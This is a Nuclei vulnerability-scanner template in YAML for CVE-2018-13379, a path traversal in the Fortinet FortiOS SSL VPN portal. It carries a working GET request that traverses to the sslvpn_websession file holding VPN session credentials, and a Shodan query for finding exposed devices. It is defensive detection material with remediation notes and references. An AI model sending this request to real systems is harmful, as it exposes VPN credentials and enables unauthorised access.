42 lines
1.6 KiB
YAML
42 lines
1.6 KiB
YAML
id: CVE-2018-13379
|
|
|
|
info:
|
|
name: Fortinet FortiOS - Credentials Disclosure
|
|
author: organiccrap
|
|
severity: critical
|
|
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
|
|
remediation: |
|
|
Apply the necessary patches or updates provided by Fortinet to fix the vulnerability.
|
|
reference:
|
|
- https://fortiguard.com/advisory/FG-IR-18-384
|
|
- https://www.fortiguard.com/psirt/FG-IR-20-233
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-13379
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97395
|
|
epss-percentile: 0.99891
|
|
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: fortinet
|
|
product: fortios
|
|
shodan-query: http.html:"/remote/login" "xxxxxxxx"
|
|
tags: cve,cve2018,fortios,lfi,kev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- '^var fgt_lang ='
|
|
|
|
# digest: 4a0a0047304502210083aba9f8b44d61cdf724e6c85ded421c74945d72fd937a73777c659f96e25f6a022036ef5154483b0d23becaf40adc0b47e050c2df73e092a1fcd434a873bcba668e:922c64590222798bb761d5b6d8e72950
|